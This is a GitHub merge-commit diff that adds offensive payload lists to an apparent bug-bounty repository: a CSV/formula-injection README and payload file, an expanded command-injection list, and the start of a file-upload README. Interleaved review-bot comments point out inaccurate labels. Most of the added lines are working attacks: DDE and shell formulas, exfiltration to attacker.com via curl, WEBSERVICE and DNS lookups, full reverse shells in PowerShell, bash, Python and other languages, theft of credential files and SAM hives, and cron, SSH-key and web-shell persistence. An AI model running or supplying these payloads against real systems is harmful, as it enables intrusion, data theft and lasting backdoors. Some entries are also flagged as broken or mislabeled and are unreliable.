Merge pull request #5 from Stalin-143/copilot/add-nomql-injections-and-payloads

Add NoSQL, CSV, File Upload payloads, enhance Command Injection and XSS (2020-2025)
Stalin
2026-01-05 01:26:48 +05:30
committed by GitHub
9 changed files with 1996 additions and 24 deletions
+42
@@ -0,0 +1,42 @@
# CSV Injection (Formula Injection)
## Description
CSV Injection (also known as Formula Injection) is a vulnerability that occurs when websites embed untrusted input inside CSV files. When a spreadsheet application (like Microsoft Excel, LibreOffice Calc, or Google Sheets) opens a CSV file containing malicious formulas, it may execute the formulas, leading to arbitrary command execution, information disclosure, or other attacks.
## Common Attack Vectors
- Export functionality (user data, reports, analytics)
- Contact forms that export to CSV
- User profile data exports
- Order history exports
- Any feature that generates downloadable CSV files
- Import/Export features in CRM systems
- Billing and invoice downloads
- Survey results exports
## Testing Approach
Submit formula characters (=, +, -, @, \t, \r) followed by commands or formulas in:
- Name fields
- Address fields
- Comment/description fields
- Any user-controllable data that might be exported to CSV
## Risk Impact
- Remote code execution via DDE (Dynamic Data Exchange)
- Information disclosure (reading local files)
- SSRF (Server-Side Request Forgery)
- Credential theft
- Malware distribution
## Common Vulnerable Patterns
- Direct export of user input to CSV without sanitization
- Missing CSV encoding/escaping
- Lack of formula character stripping
- Client-side only validation
## Payloads
See `csv-injection-payloads.txt` for a comprehensive list of CSV injection payloads covering:
- Formula injection techniques
- DDE (Dynamic Data Exchange) attacks
- Command execution payloads
- Data exfiltration methods
- Multi-application compatibility
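Review bot: the `## Risk Impact` list mislabels two items and the README gives no mitigation guidance. `SSRF (Server-Side Request Forgery)` is the wrong term: `WEBSERVICE`, `IMPORTXML` and `HYPERLINK` requests are issued from the viewer's spreadsheet client (or Google's fetchers in the case of Sheets), not from the exporting application's server, so call it client-side data exfiltration or outbound request from the viewer. `Remote code execution via DDE` is user-assisted: current Excel versions show warning dialogs before launching an external application through DDE, so state that the impact depends on the viewer accepting those prompts. Add a `## Mitigation` section next to `## Common Vulnerable Patterns`, since the patterns list already implies the fix: at export time on the server, prefix any field value that starts with `=`, `+`, `-`, `@`, tab or carriage return with a single quote (or a space), always quote fields and double any embedded `"` per RFC 4180, and do not rely on client-side validation.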
+328
@@ -0,0 +1,328 @@
# CSV Injection Payloads (Formula Injection) - 2020-2025
# ============================
# Basic Formula Injection
# ============================
# Equals Formula
=1+1
=1+2+3
=SUM(1+1)
=2+5+cmd|' /C calc'!A0
="string"
=CMD|' /C powershell IEX(wget attacker.com/shell.ps1)'!A0
# Plus Formula
+1+1
+cmd|'/c calc'!A1
+DDE("cmd";"/c calc";"!")
# Minus Formula
-1+1
-cmd|'/c calc'!A1
-DDE("cmd";"/c calc";"!")
# At Symbol Formula
@sum(1+1)
@SUM(A1:A10)
# Tab Character
=1+1
+1+1
-1+1
@sum(1+1)
# Carriage Return
=1+1
+=1+1
# ============================
# DDE (Dynamic Data Exchange) Attacks
# ============================
# Basic DDE - Command Execution
=DDE("cmd";"/c calc";"!")
=DDE("cmd";"/c calc.exe";"!")
=DDE("cmd";"/c powershell";"!")
=DDE("cmd";"/c cmd";"!")
# DDE - File Reading
=DDE("cmd";"/c type C:\Windows\System32\drivers\etc\hosts";"!")
=DDE("cmd";"/c type C:\Users\*\Desktop\passwords.txt";"!")
=DDE("cmd";"/c dir C:\";"!")
# DDE - Information Disclosure
=DDE("cmd";"/c whoami";"!")
=DDE("cmd";"/c hostname";"!")
=DDE("cmd";"/c ipconfig";"!")
=DDE("cmd";"/c net user";"!")
=DDE("cmd";"/c systeminfo";"!")
# DDE - Data Exfiltration
=DDE("cmd";"/c curl http://attacker.com?data=$(whoami)";"!")
=DDE("cmd";"/c powershell -c Invoke-WebRequest -Uri http://attacker.com -Method POST -Body (Get-Content C:\passwords.txt)";"!")
=DDE("cmd";"/c certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe";"!")
# DDE - Reverse Shell
=DDE("cmd";"/c powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"";"!")
# ============================
# Excel HYPERLINK Function
# ============================
=HYPERLINK("http://attacker.com","Click here")
=HYPERLINK("http://attacker.com?cookie="&A1,"Click")
=HYPERLINK("file:///C:/Windows/System32/calc.exe","Click to update")
=HYPERLINK(CONCATENATE("http://attacker.com/",A1),"Link")
# ============================
# IMPORTXML / WEBSERVICE Functions
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTXML(CONCAT("http://attacker.com?data=",A1),"//data")
=WEBSERVICE("http://attacker.com")
=WEBSERVICE(CONCAT("http://attacker.com?leak=",A1))
# ============================
# Obfuscation Techniques
# ============================
# Using CHAR function to hide commands
=CHAR(61)&"DDE(""cmd"";""/c calc"";""!"")"
=CONCATENATE(CHAR(61),"1+1")
=CHAR(61)&CHAR(68)&CHAR(68)&CHAR(69)&"(""cmd"";""/c calc"";""!"")"
# Using string concatenation
="="&"1+1"
=CONCATENATE("=","1+1")
="="&"DDE(""cmd"";""/c calc"";""!"")"
# Double encoding
==1+1
=+1+1
= =1+1
# Null byte injection
=1+1%00
=DDE("cmd";"/c calc";"!")%00
# Unicode characters
1+1
﹢1+1
⁼1+1
# Whitespace obfuscation
= 1+1
= 1+1
= 1+1
# ============================
# Cross-Application Payloads
# ============================
# LibreOffice Calc
=SHELL("calc")
=SHELL("gnome-calculator")
=SHELL("xterm -e bash")
=SHELL("wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh")
# Google Sheets
=IMAGE("http://attacker.com/track.png")
=IMAGE("https://attacker.com/"&A1)
=IMPORTDATA("http://attacker.com/data.csv")
=IMPORTFEED("http://attacker.com/feed")
=IMPORTHTML("http://attacker.com","table",1)
=IMPORTRANGE("spreadsheet-id","Sheet1!A1:B10")
# ============================
# Advanced Techniques (2023-2025)
# ============================
# Chained formulas
=IF(A1="admin",DDE("cmd";"/c calc";"!"),"safe")
=IF(ISNUMBER(SEARCH("admin",A1)),WEBSERVICE("http://attacker.com"),"")
# Nested functions
=SUM(DDE("cmd";"/c calc";"!"))
=CONCATENATE(DDE("cmd";"/c whoami";"!"))
# Conditional execution
=IF(1=1,DDE("cmd";"/c calc";"!"),1)
=IFERROR(DDE("cmd";"/c calc";"!"),1)
# ============================
# Context-Aware Payloads
# ============================
# Name field
=DDE("cmd";"/c calc";"!")
+DDE("cmd";"/c calc";"!")
-DDE("cmd";"/c calc";"!")
@DDE("cmd";"/c calc";"!")
# Email field
test@test.com=DDE("cmd";"/c calc";"!")
=WEBSERVICE("http://attacker.com")@test.com
# Comment field
Great product! =DDE("cmd";"/c calc";"!")
Review: +cmd|'/c calc'!A1
# ============================
# Payload Variations for WAF Bypass
# ============================
# Mixed case
=dDe("cmd";"/c calc";"!")
=DdE("cmd";"/c calc";"!")
# Alternative quotes
=DDE('cmd';'/c calc';'!')
=DDE(`cmd`;`/c calc`;`!`)
# Line breaks
=DDE("cmd";
"/c calc";
"!")
# Tabs and spaces
=DDE( "cmd" ; "/c calc" ; "!" )
# ============================
# Platform-Specific Payloads
# ============================
# Windows
=cmd|'/c calc'!A1
=cmd|'/c powershell -c "Start-Process calc"'!A1
=cmd|'/c mshta http://attacker.com/payload.hta'!A1
=cmd|'/c certutil -urlcache -split -f http://attacker.com/bad.exe bad.exe && bad.exe'!A1
=cmd|'/c wmic process call create "calc.exe"'!A1
=cmd|'/c reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'!A1
# Linux/Unix
=SHELL("calc")
=SHELL("xcalc")
=SHELL("xterm")
=SHELL("/bin/bash -i >& /dev/tcp/attacker.com/4444 0>&1")
=SHELL("curl http://attacker.com/shell.sh | bash")
=SHELL("nc attacker.com 4444 -e /bin/sh")
# macOS
=SHELL("open /Applications/Calculator.app")
=SHELL("osascript -e 'tell application \"Calculator\" to activate'")
=SHELL("curl http://attacker.com/payload.sh | sh")
# ============================
# Data Exfiltration Payloads
# ============================
# Exfiltrate cell data
=WEBSERVICE("http://attacker.com?data="&A1)
=HYPERLINK("http://attacker.com?token="&B2,"Update")
=IMAGE("http://attacker.com/track.gif?user="&C3)
# Exfiltrate multiple cells
=WEBSERVICE("http://attacker.com?u="&A1&"&p="&B1)
=CONCATENATE("http://attacker.com/",A1,"/",B1,"/",C1)
# ============================
# Denial of Service
# ============================
# Resource exhaustion
=SUM(1:1048576)
=IF(A1<>"",$A$1:$XFD$1048576,"")
=VLOOKUP(A1,$A$1:$XFD$1048576,1,FALSE)
# Circular references
=A1
# Note: When placed in cell A1 itself, this causes a circular reference error
# ============================
# Remote File Inclusion
# ============================
=IMPORTXML("http://attacker.com/xxe.xml","//data")
=IMPORTHTML("http://attacker.com/malicious.html","table",1)
=IMPORTFEED("http://attacker.com/rss")
=IMPORTDATA("http://attacker.com/data.txt")
# ============================
# XXE via CSV (when parsed as XML internally)
# ============================
=IMPORTXML("data:text/xml,<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><foo>&xxe;</foo>","//foo")
# ============================
# Social Engineering Payloads
# ============================
Please verify your account: =HYPERLINK("http://phishing.com","Click Here")
Congratulations! You won: =DDE("cmd";"/c calc";"!")
URGENT - Security Update Required =cmd|'/c powershell iex(wget attacker.com/malware.ps1)'!A1
Invoice #12345 =WEBSERVICE("http://attacker.com/log")
# ============================
# Polyglot Payloads
# ============================
=1+1';alert(document.domain)//
=DDE("cmd";"/c calc";"!")||'<script>alert(1)</script>
+cmd|'/c calc'!A1'"><img src=x onerror=alert(1)>
# ============================
# Null Cell Reference
# ============================
=A0
=DDE("cmd";"/c calc";"!")!A0
=cmd|'/c powershell'!A0
# ============================
# Format Confusion
# ============================
"=1+1"
'=1+1
`=1+1
´=1+1
# ============================
# Batch CSV Injection (Multiple Rows)
# ============================
# First row normal, second row malicious
Normal User,user@email.com,Regular Comment
Hacker,=DDE("cmd";"/c calc";"!"),Malicious
# ============================
# CSV Injection in Different Contexts
# ============================
# In URL parameters
?name==DDE("cmd";"/c calc";"!")
?search=+cmd|'/c calc'!A1
# In JSON (if converted to CSV)
{"name": "=DDE(\"cmd\";\"/c calc\";\"!\")"}
# In XML (if converted to CSV)
<name>=cmd|'/c calc'!A1</name>
# ============================
# Time-Delayed Payloads
# ============================
=IF(NOW()>DATE(2024,1,1),DDE("cmd";"/c calc";"!"),1)
=IF(TODAY()=WEEKDAY(1),WEBSERVICE("http://attacker.com"),1)
# ============================
# Modern Framework Specific (2024-2025)
# ============================
# When exported from web applications
=WEBSERVICE(CONCAT("http://attacker.com/?cookie=",CELL("filename")))
=HYPERLINK("javascript:alert(document.cookie)","click")
=@SUM(A1:A1000)*WEBSERVICE("http://attacker.com")
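Review bot: several entries in this list are not reproducible as written and some headings mislabel their contents, which matters if the file feeds a scanner or a sanitizer test suite. The entries under `# Tab Character` and `# Carriage Return` render identically to the `# Basic Formula Injection` ones because the leading control character is invisible; write them with an explicit escape (`\t=1+1`, `\r=1+1`) and state in the file header that consumers must unescape, otherwise the tab/CR cases are silently lost whenever the file is copied. `# Whitespace obfuscation` repeats `= 1+1` three times (presumably different whitespace code points, again invisible), and the trailing `%00` on `=1+1%00` and `=DDE(...)%00` is URL-encoding that only means something inside a request, not inside a cell. `# XXE via CSV (when parsed as XML internally)` is misnamed: the `IMPORTXML("data:text/xml,...")` entry is a Google Sheets fetch of a data: URI, not an XML parse of the CSV itself, and `# Modern Framework Specific (2024-2025)` contains nothing framework-specific. The `# Alternative quotes` entries (`=DDE('cmd';...)`, backticks) are not valid Excel string syntax, so label them as filter-probe inputs rather than working formulas; the defensive point worth stating beside them is that an exporter must key on the leading character, not on whether the remainder parses as a formula.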
+515 -23
@@ -1,6 +1,10 @@
# Command Injection Payloads
# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition)
# Basic command injection
# ============================
# BASIC COMMAND INJECTION
# ============================
# Command Separators
; ls
| ls
|| ls
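Review bot: the retitled header (`# Command Injection Payloads (2020-2025 Enhanced Bug Bounty Edition)`) is the only place the file's conventions could be documented, and none are. Add a short header comment here stating that `ATTACKER_IP`, `PORT`, `YOUR_IP`, `SECOND_PORT`, `BASE64_ENCODED_COMMAND` and `attacker.com` are placeholders to be substituted and that entries containing them will not execute verbatim; the following hunk uses these tokens without defining them and switches between `YOUR_IP` and `ATTACKER_IP` for the same thing.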
@@ -8,73 +12,561 @@
&& ls
`ls`
$(ls)
%0a ls
\n ls
# Chained commands
# Chained Commands
; whoami
| whoami
|| whoami
& whoami
&& whoami
# Command substitution
# Command Substitution
`whoami`
$(whoami)
;`whoami`
;$(whoami)
$((whoami))
# File operations
# ============================
# LINUX/UNIX COMMANDS
# ============================
# File Operations
; cat /etc/passwd
| cat /etc/passwd
; cat /etc/shadow
| cat /etc/shadow
; ls -la
; ls -la /
| ls -la /
; head -n 50 /etc/passwd
; tail -n 50 /var/log/auth.log
# Windows commands
# System Information
; uname -a
; hostname
; id
; whoami
; pwd
; env
; set
; printenv
; cat /proc/version
; cat /etc/issue
; cat /etc/*-release
; ifconfig
; ip addr
; route -n
; netstat -tulpn
; ps aux
; w
; last
# File Discovery
; find / -name "*.conf" 2>/dev/null
; find / -name "config*" 2>/dev/null
; find / -name "*password*" 2>/dev/null
; find / -perm -4000 2>/dev/null
; locate password
; locate admin
; which gcc
; which python
; which perl
# Reading Sensitive Files
; cat ~/.bash_history
; cat ~/.ssh/id_rsa
; cat ~/.ssh/authorized_keys
; cat /var/www/html/config.php
; cat /var/www/html/wp-config.php
; cat /etc/apache2/apache2.conf
; cat /etc/nginx/nginx.conf
; cat /root/.ssh/id_rsa
# ============================
# WINDOWS COMMANDS
# ============================
# Basic Commands
& dir
| dir
& dir C:\
& type C:\Windows\win.ini
| type C:\boot.ini
& whoami
| net user
& hostname
& ipconfig
& systeminfo
# Time-based detection
# Windows System Info
& systeminfo
& wmic qfe list
& wmic logicaldisk get caption
& net user
& net localgroup administrators
& net user /domain
& net group /domain
& net group "Domain Admins" /domain
& tasklist
& netstat -ano
& ipconfig /all
& route print
& arp -a
# Windows File Operations
& type C:\Users\Administrator\Desktop\passwords.txt
& dir C:\Users\
& dir C:\inetpub\wwwroot\
& type C:\Windows\System32\drivers\etc\hosts
& reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
& reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# PowerShell Commands
& powershell Get-Process
& powershell Get-Service
& powershell Get-NetIPConfiguration
& powershell Get-ComputerInfo
& powershell Get-LocalUser
& powershell Get-LocalGroup
& powershell Get-ChildItem C:\ -Recurse -Include *.txt,*.doc,*.pdf -ErrorAction SilentlyContinue
& powershell -c "Get-Content C:\Users\Administrator\Desktop\passwords.txt"
# Windows Credential Dumping
& reg save HKLM\SAM C:\temp\sam.hive
& reg save HKLM\SYSTEM C:\temp\system.hive
& reg save HKLM\SECURITY C:\temp\security.hive
# ============================
# TIME-BASED BLIND INJECTION
# ============================
# Linux
; sleep 5
| sleep 5
& ping -n 5 127.0.0.1
| ping -c 5 127.0.0.1
; timeout 5
& timeout /t 5
|| sleep 5
& sleep 5
&& sleep 5
; sleep 10
`sleep 5`
$(sleep 5)
# Output redirection
# Using ping for delay
; ping -c 5 127.0.0.1
| ping -c 10 127.0.0.1
|| ping -c 5 localhost
# Windows
& timeout 5
| timeout 5
& timeout /t 5
& ping -n 5 127.0.0.1
| ping -n 10 127.0.0.1
& ping 127.0.0.1 -n 5 > nul
# ============================
# OUTPUT REDIRECTION & EXFILTRATION
# ============================
# Output to File
; ls > /tmp/output.txt
| ls > /tmp/output.txt
& dir > C:\temp\output.txt
; whoami > /var/www/html/whoami.txt
; cat /etc/passwd > /tmp/passwd.txt
# URL encoded
%3B%20ls
%7C%20ls
# Append to File
; ls >> /tmp/output.txt
; whoami >> /var/www/html/info.txt
# Error Redirection
; ls 2>&1
; cat /etc/shadow 2>/dev/null
; find / -name "*.conf" 2>/dev/null
# Data Exfiltration via HTTP
; curl http://attacker.com?data=$(whoami)
; wget http://attacker.com/exfil?data=$(cat /etc/passwd | base64)
; curl -d "data=$(cat /etc/passwd)" http://attacker.com/collect
& powershell -c "Invoke-WebRequest -Uri http://attacker.com?data=$(whoami) -Method GET"
# DNS Exfiltration
; nslookup $(whoami).attacker.com
; dig $(whoami).attacker.com
; host $(whoami).attacker.com
# ============================
# ENCODING & OBFUSCATION
# ============================
# URL Encoding
%3B%20whoami
%7C%20whoami
%26%20whoami
%0a%20whoami
%0d%0a%20whoami
# Double URL Encoding
%253B%2520whoami
%257C%2520whoami
# Unicode Encoding
\u003b whoami
# Hex Encoding
\x3b whoami
\x0a whoami
# Octal Encoding
\073 whoami
# ============================
# NEWLINE INJECTION
# ============================
# Newline injection
%0a whoami
%0d%0a whoami
\n whoami
\r\n whoami
\r whoami
%0awhoami
%0d%0awhoami
# Spaces bypass
# ============================
# SPACE BYPASS TECHNIQUES
# ============================
# No Space
;cat</etc/passwd
|cat</etc/passwd
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
cat$IFS$9/etc/passwd
cat${IFS}${PATH%%:*}
# Quotes bypass
# Brace Expansion
{cat,/etc/passwd}
{ls,-la,/}
# Tab Character
cat%09/etc/passwd
cat /etc/passwd
# Variable Expansion
X=$'cat\x20/etc/passwd'&&$X
IFS=,;`cat<<<cat,/etc/passwd`
# ============================
# FILTER BYPASS TECHNIQUES
# ============================
# Quotes Bypass
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
/b''i''n/c''at /etc/passwd
/\b\i\n/\c\a\t /etc/passwd
# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
; nc -e /bin/sh YOUR_IP PORT
| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
# Wildcards
/???/??t /???/??ss??
/bin/c?t /etc/p?sswd
/bin/ca* /etc/pass*
/b*n/c*t /e*c/p*wd
# Variable Substitution
$PATH
$HOME
$PWD
${PATH:0:1}
echo ${LS_COLORS:0:1}
# Concatenation
ca''t /etc/passwd
c""at /etc/passwd
c\a\t /etc/passwd
# Case Manipulation (Bash)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
# ============================
# COMMAND SUBSTITUTION VARIATIONS
# ============================
`whoami`
$(whoami)
$((whoami))
`echo $(whoami)`
$(echo `whoami`)
a=$(whoami);echo $a
a=`whoami`;echo $a
# ============================
# REVERSE SHELLS (FOR AUTHORIZED TESTING)
# ============================
# Bash Reverse Shell
; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
| bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
; 0<&196;exec 196<>/dev/tcp/ATTACKER_IP/PORT; sh <&196 >&196 2>&196
# NC Reverse Shell
; nc -e /bin/sh ATTACKER_IP PORT
; nc ATTACKER_IP PORT -e /bin/bash
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f
# Python Reverse Shell
; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Perl Reverse Shell
; perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# PHP Reverse Shell
; php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
# Ruby Reverse Shell
; ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
# Telnet Reverse Shell
; telnet ATTACKER_IP PORT | /bin/bash | telnet ATTACKER_IP SECOND_PORT
# Windows PowerShell Reverse Shell
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Windows CMD Reverse Shell
& powershell IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')
# ============================
# REMOTE CODE EXECUTION (RCE)
# ============================
# Download and Execute
; curl http://attacker.com/shell.sh | bash
; wget http://attacker.com/shell.sh -O- | bash
; curl http://attacker.com/exploit.py | python
& certutil -urlcache -split -f http://attacker.com/shell.exe C:\temp\shell.exe
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# Execute In-Memory
; echo "curl http://attacker.com/payload" | bash
& powershell -enc BASE64_ENCODED_COMMAND
# ============================
# SYMBOLIC LINK ATTACKS
# ============================
# Create Symlink to Sensitive Files
; ln -s /etc/passwd /var/www/html/passwd.txt
; ln -s /etc/shadow /tmp/shadow.txt
; ln -s /root/.ssh/id_rsa /var/www/html/key.txt
; ln -s /var/www/html/config.php /tmp/config.txt
# Symlink to Directory
; ln -s /etc/ /var/www/html/etc
; ln -s /root/ /tmp/root
; ln -s / /var/www/html/rootfs
# Symlink Overwrite
; ln -sf /etc/passwd /var/www/html/index.php
; ln -sf /dev/null /var/log/access.log
# Race Condition with Symlink
; ln -s /etc/passwd target && cat target
; ln -s /etc/shadow /tmp/link && cat /tmp/link
# Symlink Arbitrary File Read
; ln -s /etc/passwd public_html/passwd
; ln -s ~/.ssh/id_rsa web/key
# Symlink in Archive Extraction (Zip Slip)
; ln -s /etc/passwd malicious_link
; tar -czf payload.tar.gz malicious_link
# ============================
# BLIND COMMAND INJECTION DETECTION
# ============================
# Time-Based Detection
|| sleep 5
& sleep 5 &
; ping -c 5 127.0.0.1
| timeout 5
# Out-of-Band (OOB) Detection
; curl http://burpcollaborator.net
; wget http://attacker.com/ping
; nslookup attacker.com
; ping attacker.com -c 1
& nslookup attacker.com
# DNS-Based Detection
; nslookup $(whoami).attacker.com
; dig $(whoami).attacker.com
; host $(hostname).attacker.com
# HTTP-Based Detection
; curl http://attacker.com/?id=injection
; wget http://attacker.com/?test=injection
# ============================
# POLYGLOT COMMAND INJECTION
# ============================
test;whoami
test|whoami
test||whoami
test&whoami
test&&whoami
test`whoami`
test$(whoami)
test%0awhoami
test\nwhoami
# ============================
# ADVANCED FILTER BYPASSES (2023-2025)
# ============================
# Whitespace Alternatives
cat</etc/passwd
cat<>/etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
# Null Byte
cat /etc/passwd%00
whoami%00
# Comment Injection
cat /etc/passwd#comment
whoami#comment
cat /etc/passwd//comment
# Using $PATH
${PATH:0:1}bin${PATH:0:1}cat ${PATH:0:1}etc${PATH:0:1}passwd
# Using $HOME
$HOME/../../etc/passwd
# Glob Characters
/???/c?t /???/p?ssw?
# ============================
# WAF/IDS BYPASS
# ============================
# Case Variations
Cat /etc/passwd
CAT /etc/passwd
cAt /etc/passwd
# Using Tabs
cat%09/etc/passwd
# Using Line Feed
cat%0a/etc/passwd
# Combining Techniques
c''a''t${IFS}/e''t''c/p''a''s''s''w''d
# ============================
# CONTEXT-SPECIFIC INJECTIONS
# ============================
# In Email Field
user@domain.com; whoami
user@domain.com| whoami
user@domain.com`whoami`
# In Filename
file.txt; whoami
file.txt| cat /etc/passwd
$(whoami).txt
# In URL
http://example.com/page?id=1; whoami
http://example.com/page?id=1| cat /etc/passwd
# ============================
# CRON JOB INJECTION
# ============================
# Persistent Access
; (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'") | crontab -
; echo "* * * * * curl http://attacker.com/shell.sh | bash" | crontab -
# ============================
# SSH KEY INJECTION
# ============================
# Add SSH Key for Persistence
; echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys
; mkdir -p ~/.ssh && echo "ssh-rsa ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys
# ============================
# BACKDOOR INSTALLATION
# ============================
# Web Shell Upload
; curl http://attacker.com/shell.php -o /var/www/html/shell.php
; wget http://attacker.com/backdoor.php -O /var/www/html/bd.php
# Binary Download and Execute
; curl http://attacker.com/backdoor -o /tmp/bd && chmod +x /tmp/bd && /tmp/bd
; wget http://attacker.com/malware -O /tmp/malware && chmod +x /tmp/malware && /tmp/malware &
# ============================
# PRIVILEGE ESCALATION CHECKS
# ============================
# SUID Binaries
; find / -perm -4000 -type f 2>/dev/null
; find / -perm -u=s -type f 2>/dev/null
# Sudo Permissions
; sudo -l
; cat /etc/sudoers
# Writable Files
; find / -writable -type f 2>/dev/null
; find / -perm -222 -type f 2>/dev/null
# ============================
# LOG POISONING
# ============================
# Apache/Nginx Log Poisoning
; echo "<?php system(\$_GET['cmd']); ?>" >> /var/log/apache2/access.log
; echo "<?php system(\$_GET['cmd']); ?>" >> /var/log/nginx/access.log
# ============================
# ENVIRONMENT VARIABLE MANIPULATION
# ============================
; export PATH=/tmp:$PATH
; echo $PATH
; printenv
# ============================
# MODERN TECHNIQUES (2024-2025)
# ============================
# Abusing Built-in Features
; source <(curl -s http://attacker.com/script.sh)
; eval "$(curl -s http://attacker.com/cmd.txt)"
# JavaScript Command Injection (Node.js)
; node -e "require('child_process').exec('whoami')"
# Using Alternative Shells
; sh -c whoami
; bash -c whoami
; zsh -c whoami
; ksh -c whoami
# Exploiting Interpreters
; python -c "import os;os.system('whoami')"
; perl -e 'system("whoami")'
; ruby -e 'system("whoami")'
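Review bot: a number of entries in this hunk do not execute as written, so a harness that relies on them for detection gets false negatives; fix or drop them rather than leaving them beside working probes. `; timeout 5` (under `# Linux`) is a usage error because GNU `timeout` requires a command argument; `$((whoami))` is arithmetic expansion of an unset variable and evaluates to `0` without running anything, so it does not belong under `# Command Substitution`; `Cat`, `CAT` and `cAt /etc/passwd` fail on Linux because command lookup is case-sensitive (they only resolve on case-insensitive filesystems); `cat /etc/passwd//comment` treats `//comment` as part of the path, not a comment, and errors because `/etc/passwd` is a file. Structure problems: `& ping -n 5 127.0.0.1` and `& timeout /t 5` are Windows syntax listed under `# Linux` while a separate `# Windows` block follows; the three reverse-shell lines under `# Quotes Bypass` (with `YOUR_IP`) duplicate the later `REVERSE SHELLS` section (with `ATTACKER_IP`), and the PowerShell one there is a truncated fragment that ends after the `TCPClient` constructor; `{cat,/etc/passwd}`, `cat%09/etc/passwd`, `X=$'cat\x20/etc/passwd'&&$X` and the `nslookup $(whoami).attacker.com` DNS probe each appear in two or three sections. The `# Symlink in Archive Extraction (Zip Slip)` label is inaccurate: Zip Slip is path traversal in archive entry names, whereas these lines build a tarball containing a symlink, which is a different (symlink-following) extraction issue. Finally, the file mixes detection probes (time-based, OOB) with persistence and post-exploitation commands (`CRON JOB INJECTION`, `SSH KEY INJECTION`, `BACKDOOR INSTALLATION`, `LOG POISONING`) under one title; either split them or say in the header which sections are detection-only.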
+73
@@ -0,0 +1,73 @@
# File Upload Vulnerabilities
## Description
File upload vulnerabilities occur when a web application allows users to upload files without properly validating the file type, content, or destination. Attackers can exploit these vulnerabilities to upload malicious files, leading to remote code execution (RCE), arbitrary file read/write, cross-site scripting (XSS), and other attacks.
## Common Attack Vectors
- Profile picture upload
- Document upload features
- Resume/CV upload
- Image galleries
- File sharing functionality
- Import/export features
- Backup/restore functionality
- Plugin/theme upload (CMS)
- Attachment features
## Testing Approach
Test various file upload bypasses:
- Extension bypasses (double extensions, case variations, null bytes)
- Content-Type manipulation
- Magic byte manipulation
- Polyglot files (valid image + valid code)
- Archive file manipulation (zip, tar)
- Path traversal in filenames
- File overwrite attacks
- XXE via SVG/XML files
## Risk Impact
- **Remote Code Execution (RCE)** - Upload and execute web shells
- **Cross-Site Scripting (XSS)** - Upload HTML/SVG files with JavaScript
- **Path Traversal** - Overwrite critical files
- **Denial of Service** - Upload large files, zip bombs
- **Information Disclosure** - Read sensitive files
- **Defacement** - Overwrite web pages
- **Malware Distribution** - Host malicious files
## Common Vulnerable Patterns
- Blacklist-based file type validation (instead of whitelist)
- Client-side only validation
- Inadequate Content-Type checking
- Missing magic byte validation
- Predictable upload paths
- Executable permissions on upload directories
- Lack of file size limits
- No antivirus scanning
## File Extensions to Test
**Web Shells & RCE:**
